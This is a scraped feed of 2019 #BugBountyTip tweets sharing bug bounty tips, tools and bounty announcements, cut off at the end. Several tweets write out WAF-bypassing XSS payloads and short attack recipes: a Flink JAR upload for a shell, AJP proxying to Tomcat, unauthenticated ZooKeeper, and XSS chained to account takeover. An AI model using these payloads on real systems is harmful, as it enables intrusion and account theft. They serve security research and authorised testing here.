0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking(takeover) but what how Broken Link Hijacking? You can utilize this vulnerable to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
Halil AHMAD
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
Halil AHMAD
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
7 I've been testing newer versions of #ffuf by @joohoi. It's dope being able to fuzz for files w/ 100 threads at 350reqs/sec w/ nearly no failures/stability issues! If you need BOTH stability & speed, then #ffuf is the only tool you need for web fuzzing. #bugbounty #BugBountyTip https://t.co/bWhywAAvVx
Ismayil Tahmazov
@Tismayil1


2019-11-10 18:20:10
5 Sometimes we have to do the impossible. SQL'Injection Attempt from Remote Site With this method: XSS, SQL'i, CSRF attacks can be done. Failure to filter the data from the remote source leaves open doors for such attacks. #bugbountytips #BugBountyTip #bugbounty #whitehat https://t.co/bb29oBdpGL
Infected Drake
@0xInfection


2019-11-10 13:33:03
8 Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try. 😉 https://t.co/OKUlxHNUO3 #infosec #appsec #bugbounty #bugbountytip https://t.co/5NMCR7YRMq
Halil AHMAD
@Halilahmadd


2019-11-10 11:04:00
3 Indispensable xss bypass payload. ">'><details/open/ontoggle=confirm('XSS')> #BugBounty #XSS #BugBountyTip #infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-10 08:26:32
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5ryR3 #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
ALL ABOUT HACKER
@AboutHacking


2019-11-10 07:35:08
0 Cross Site Scripting attack Basic to advance [ part 6] Read:https://t.co/H4hJHhsdO5 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/HkDrjRxblY
Shantanu Kulkarni
@Iamshantanukul


2019-11-10 06:58:55
0 If u can determine which opn source packages r usd in d application u r attacking ,u can download these n perform a code review or install them to experiment on. vulnerability in any of these may be exploitable to compromise d wider application #BugBountyTip #bugcrowd #hackerone
Hussein Daher
@HusseiN98D


2019-11-10 00:02:37
15 Sharing one of my secrets #BugBountyTip When discovering subdomains/domains/assets owned by a company, use the Google Analytics ID to expand your attack surface. The ID is in the HTML code. Reverse search then: https://t.co/fkWSWj8GUn RT once this helps!#bugbountytips #infosec
ALL ABOUT HACKER
@AboutHacking


2019-11-09 20:55:07
0 Cross Site Scripting Attack Series [ Baisc to Advance] Read: https://t.co/xZTIBcHlHr #cybersecurity #bugbounty #bugbountytip #bugbountytips #hacking https://t.co/QCQPhiYPtu
Murdockz
@Murdockz_CEH


2019-11-09 20:45:45
1 Remember this picture and date it was posted. When I share that I was rewarded XXXXX amount for a bug...you now know why. Step back learn and work hard to hit harder. ๐Ÿ˜Ž #bugbountytips #bugbountytip #StayHumble https://t.co/69lsVZNGPt
Paulos Yibelo
@PaulosYibelo


2019-11-09 18:04:05
1 I started seeing posts about escalating bugs for maximum impact. This is an article I wrote about how to escalate XSS for maximum gain back in Feb 2018: https://t.co/W7sZLunr6N #BugBounty #BugBountyTip #BoomerAdvice
Avi
@avileox


2019-11-09 03:28:43
2 Small Python library that makes it easy to exploit race conditions in web apps with Requests https://t.co/bkBGTn8SNu #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-09 00:11:43
0 Less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ismayil Tahmazov
@Tismayil1


2019-11-08 23:16:27
2 I Earned $XXXX OS Command Injection Private Program. Used Repos 1 : Dir Searcher : https://t.co/1L6MutcaEc 2 : Sub Scanner : https://t.co/ZRcZb6ovUa #BugBounty #bugbountytips #bugbountytip #whitehat https://t.co/OPOc6mVkTc
Ammar Amer🇸🇾
@cry__pto


2019-11-08 21:34:35
7 -Hacking for Beginners.pdf: https://t.co/aQoLE86OKL -HTB: CTF.pdf: https://t.co/PCbL2YSGZR -HTB_ Hackback.pdf: https://t.co/Jz1m0qlU2a -Keep Calm and Hack The Box - Devel.pdf: https://t.co/Jz1m0qlU2a #bugbountytips #Hacking #redteam #Pentesting #infosec #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-08 13:20:02
0 Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-11-07 23:37:34
1 Great stuff here, check this out! #bugbountytip #IDOR #BOLA https://t.co/2q0MbSeOie
Arif Khan
@payloadartist


2019-11-07 21:25:23
2 LiveTargetsFinder - tool to automate #bugbounty recon. #bugbountytip https://t.co/aP0oQC0qdr
Nick || hunt4p1zza
@ngkogkos


2019-11-07 17:47:02
0 Agree with Jason here, it is a good #bugbountytip but need to be cautious. I would only set up an AutoRepeater/Burp rule for true/false, if I was highly familiar with my test user's data and the website's behavior. #bugbounty https://t.co/iMVChw8zkX
Karna
@karna__1


2019-11-07 15:41:35
0 Burned out? Bored? Need a really cool time-pass? I dare you to enter https://t.co/sJMORd6dlX All the @PortSwiggerRes content are 🔥🔥🔥 Soo much to learn. Just go bring your geek-self out! #research #infosec #bugbountytip #bugbountytips #hackers #hacking #geeks
warbid
@id_warb


2019-11-07 14:41:19
0 Use PDO they said PDO will save you from SQL injections they said #bugbountytip https://t.co/NUtccgqMR7
intigriti
@intigriti


2019-11-07 13:04:04
18 Looking for business logic flaws 👀? Flows with multiple steps are a good place to start. Try to skip steps or execute them in a wrong order and see what happens 😈 Thanks for the #BugBountyTip, @InsiderPhD! https://t.co/bw6Z28K6fE
bugbountytip
@a_l_e_r_t_1_


2019-11-07 06:51:34
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
darkmage
@therealdarkmage


2019-11-06 22:22:45
0 Got a $50 Amazon giftcard for reporting an #XSS to a company with no #bugbounty program. #bugbountytip: If you find a bug on a website/app that does not appear to have an active program, take heart and have courage and faith! Report it and see if they can compensate you🤘#infosec https://t.co/2Kql2FconG
Vinothkumar
@vinothpkumar


2019-11-06 16:57:18
0 Wrote a blog on "Publicly Exposed AWS SNS Topics" #bugbounty #Bugbountytip #aws #security https://t.co/wfNbUHHpjT
Pavandeep
@Pavandep8


2019-11-06 16:12:14
2 Look what I shared: When I found iframe injection and illegal redirect (dom based) @MIUI| #Hacker #privacy #Bugbountytip #security https://t.co/TnU1JRjUDm
intigriti
@intigriti


2019-11-06 15:34:54
12 Sometimes, TRUE is all you need ✅. Use @Burp_Suite's match and replace to enable new functionalities in the UI and expand your attack surface! Thanks for the #BugBountyTip, @anshuman_bh! https://t.co/D55uMIl6Sx
Aditya Soni
@hetroublemakr


2019-11-06 14:43:08
0 Still any confusion about CVE2019 14287 Go and watch this video #infosec #Bugbountytip https://t.co/i4Mye3n7qO
Jinone
@jinonehk


2019-11-06 04:38:05
4 My first bounty blog post Get the full content of the private project internal network via ssrf https://t.co/MhKS2w6L0Z Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Arif Khan
@payloadartist


2019-11-05 19:42:20
2 Very creative way to Abuse (cross-site authenticated) HEAD Requests leading to GitHub Oauth Bypass by @not_aardvark https://t.co/dX0lF2LVJ4 #bugbounty #bugbountytip
Abay
@abaykandotcom


2019-11-05 18:59:39
0 Actually these 2 findings are invalid. However, the interesting part is where and how the XSS payload is triggered~ #ripenglish #XSS #bugbountytip #bugbounties #bugbounty https://t.co/idpR2U41zn
YogoshaOfficial
@YogoshaOfficial


2019-11-05 16:10:19
5 [#Bugbountytip] Tomcat is used, yet, port 8080 filtered? use port 8009 which is forgotten “often”. It uses AJP instead of HTTP so you your local apache as local proxy to convert traffic from HTTP to AJP. ProxyPass / ajp://target-ip:8009/ ProxyPassReverse / ajp://target-ip:8009/
Felix Kybranz
@_cybrg


2019-11-05 12:53:54
0 Got to many results from google dorks? Remove uninteresting buzzwords with: "-" site:http://paypal. com -demo -Capital Why did I miss that for so long!? Finding that was a nice wtf-moment😇 #BugBounty #bugbountytips #bugbountytip #bugbounties
m0z
@LooseSecurity


2019-11-05 12:05:14
6 #BugBounty #bugbountytip #XSS Have an XSS and want to get account takeover but document.cookie isn't working? Try a payload which grabs the CSRF token, and then sends a request to the change email endpoint to change it to your email! Now your bug is twice as valuable. ;)
bugbountytip
@a_l_e_r_t_1_


2019-11-05 07:39:35
0 Reflected XSS on Magento #BugBountyTip #BugBountyTips https://t.co/KQSpPV2Q0m via @YouTube
Anshuman Pattnaik
@anspattnaik


2019-11-05 00:29:38
0 #bugbountytip #Google I got a strange thing to know that if google user gives certain access to a third party application then as per google policy guidelines that third application has complete ownership of the user's private information such Gmail, Drive and other services.
(((Gamliel)))
@Gamliel_InfoSec


2019-11-05 00:19:18
0 If u are pentesting/bug hunting in some web app that uses JSON and it runs on IIS, don't forget to test "JSON Parameter Pollution". Under some conditions u can poisoning some parameters, break Javascript context and voilá ... #XSS #hack2learn #GivingBack2Community #BugBountyTip https://t.co/MjN3o8pVgH
m0z
@LooseSecurity


2019-11-04 22:46:32
3 Here's a useful #XSS payload with doesn't suffix "prompt" with any parenthesis! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF! #BugBounty #bugbountytips #bugbountytip #bugbounties
bugbountytip
@a_l_e_r_t_1_


2019-11-04 21:22:01
0 Now, recon tools are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Ashish Kunwar
@D0rkerDevil


2019-11-04 15:32:18
1 Found Java_rmi service on port 8001 , used nmap "rmi dumregistery" script to dump the class path Found some goodies .. #bugbounty #bugbountytips #bugbountytip #security
KNOXSS
@knoxss_me


2019-11-04 13:46:16
1 One of #KNOXSS exclusive features! #XSS #bugbountytip https://t.co/SDP6thBcrz
Ashish Kunwar
@D0rkerDevil


2019-11-04 12:21:16
1 #bugbountytip look out for port 2181 - zookeeper , check if you are able to commands , as there is no auth in place by default in zookeeper installations. #bountytip #bugbountytips #protips #bugbounty #security
Leonel Emiliano
@leoalgare


2019-11-04 12:09:59
0 POST request with json body with no csrf token but also no CORS ? Always test change the content-type to urlencoded... It works like a charm. #bugbountytips #bugbountytip #hackerone #CSRF #Hacker0x01
Milind Purswani
@MilindPurswani


2019-11-03 17:38:13
0 Had a pyserver running on my VPS for days. Shodan scanned it and saved the response lol. Is this how "karma" works? #bugbountytip
VT10 Loading 🥊🥊🔥🔥🔥
@SHIVAPURI12


2019-11-03 17:10:49
1 #MegaStar Lu oorike ayiporu,, aaaaah style,,,aaah energy ,, aaah Grace,, Ever green and Irreplaceable ,, #BossForAReason #MegaStatChiranjeevi Garu ❤️💓❤️ at #bugbountytip finals,, #EmperorOfEntertainment #MegaStar #ChiruForEver Thanks to @StarMaa
Maulik Vaidh🇮🇳 @bsidesahmedabad
@Maulik1827


2019-11-03 15:46:18
0 @bsidesahmedabad 12 Days to go... Are you excited?😃😃 #bsides #bsidesahmedabad #bugbountytip #infosec #hacking #security #conference #BugBounty https://t.co/EjmNa9ukkn
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 🎃
@spyerror


2019-11-03 04:19:08
7 cloudflare {`XSS´} «byPASS» payloads. @spyerror🎯 🥇 $cat /<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> 🥈 $cat /<svg%0Aonauxclick=0;[1].some(confirm)// #BugBounty #BugBountyTip #WAF #infosec
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:11:49
0 Bug Reported to Author. 8K+ Active sales. Script after redirect worked admin account then stored to fortend area. #bugbounty #bugbountytips #bugbountytip https://t.co/6N1XwtnN28
Ismayil Tahmazov
@Tismayil1


2019-11-02 20:10:10
0 CodeCanyon Most Popular Item. Found : CSRF -> Stored XSS. 1 - HTML form auto submit to : admin/knowledge_base/article 2 - Payload direct worked after redirect. 3 - Admin area and Fronted area payload stored. 2/1 #bugbounty #bugbountytips #bugbountytip https://t.co/RiUgDz9GHq
Arif Khan
@payloadartist


2019-11-02 18:55:25
1 Good read: Smuggling HTTP requests over fake WebSocket connection by @0ang3el https://t.co/x1CxQyCq7u #bugbounty #bugbountytip
Arif Khan
@payloadartist


2019-11-02 16:21:33
2 Nice write up by @nj_dav on Abusing HTTP hop-by-hop Request Headers https://t.co/cEB4iFqnOGโ€ฆ #bugbounty #bugbountytip
Fisher
@Regala_


2019-11-02 14:28:40
2 Making the most out of live hacking events 101: 📚 Focus on learning 👥 Meet, connect and collaborate 💯 Give your absolute best always 🥳 Have fun and enjoy #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-02 14:27:54
1 Now, Jenkins and Jira vulns are added.. Less than 1$ .. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Arif Khan
@payloadartist


2019-11-02 13:26:40
6 Nice write up by @daveysec on Abusing HTTP hop-by-hop Request Headers https://t.co/3VwrseBOta #bugbounty #bugbountytip
Andri Wahyudi 📂
@andripwn


2019-11-02 09:41:01
0 Remote Code Executions (RCE) - Bypassing Extension .png Private_Programs on @Hacker0x01 sad this duplicate :'( #bugbounty #bugbountytip #rce https://t.co/oMPTakOseD
Nikhil Mahajan
@mahajan344


2019-11-02 09:01:49
1 Thanks @detectify for another payout. #bugbountytip : If you have a vulnerability and that can be validated on the fly, try to automate that bug with #detectify scanner. With the help of automation, you don't have to worry about target :) #bugbounty #automation #ItTakesACrowd https://t.co/LjTNwXk5Ol
bugbountytip
@a_l_e_r_t_1_


2019-11-01 17:32:16
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-11-01 09:20:33
1 #SWAG 🏆🏆 Symantec 🏆🏆💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/EQfIvhpHD0
Ismayil Tahmazov
@Tismayil1


2019-11-01 07:25:06
0 Yes I Awarded $XXX. @instra Thanks For Bounty. #bugbounty #bugbountytip #bugbountytips
dark_warlord14
@dark_warlord14


2019-10-31 16:25:28
0 One must read blog post for beginners like me. Hats off to the author. #bugbountytips #bugbountytip https://t.co/ZtjGcCmSIz
Arif Khan
@payloadartist


2019-10-31 16:04:44
1 Wanted to add more juice to your #bugbounty recon? Grab this while it's hot!!! Pricing is down to $10 from $50. Bonus - if u use my referral code, c5df8625, both of us get 500 credits more!!! #bugbountytip #halloween2019 https://t.co/WWbHqqLSHo
sagar yadav
@sagaryadav8742


2019-10-31 13:01:27
0 Happy to secure @readmeio Soon I will get a nice #swag from https://t.co/zcDAQyTUV0 Program link :- https://t.co/eRXN5RdYW0 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 https://t.co/NrtLkkroHi
sagar yadav
@sagaryadav8742


2019-10-31 12:52:27
0 @zerocopter swag Happy to #secure #zerocopter #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/RSdeOn5Kjb
Hussein Daher
@HusseiN98D


2019-10-31 11:01:04
0 Please RT and add your suggestions #bugbounty #infosec #bugbountytip #bugbountytips
Max
@0xw2w


2019-10-31 09:52:20
0 Found a changing session cookie, that applying to the user’s session during login to the account? Try logout CSRF + cookie setting (using XSS/CRLF inj/etc) to takeover a session when the user entered login and password again #bugbountytip #bugbounty #infosec
jub0bs
@jub0bs


2019-10-31 07:38:46
0 #bugbountytip Go deep on recon; go broad on targets.
Samet ŞAHİN
@sametsahinnet


2019-10-31 05:44:47
0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his original account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach 🇮🇱
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dham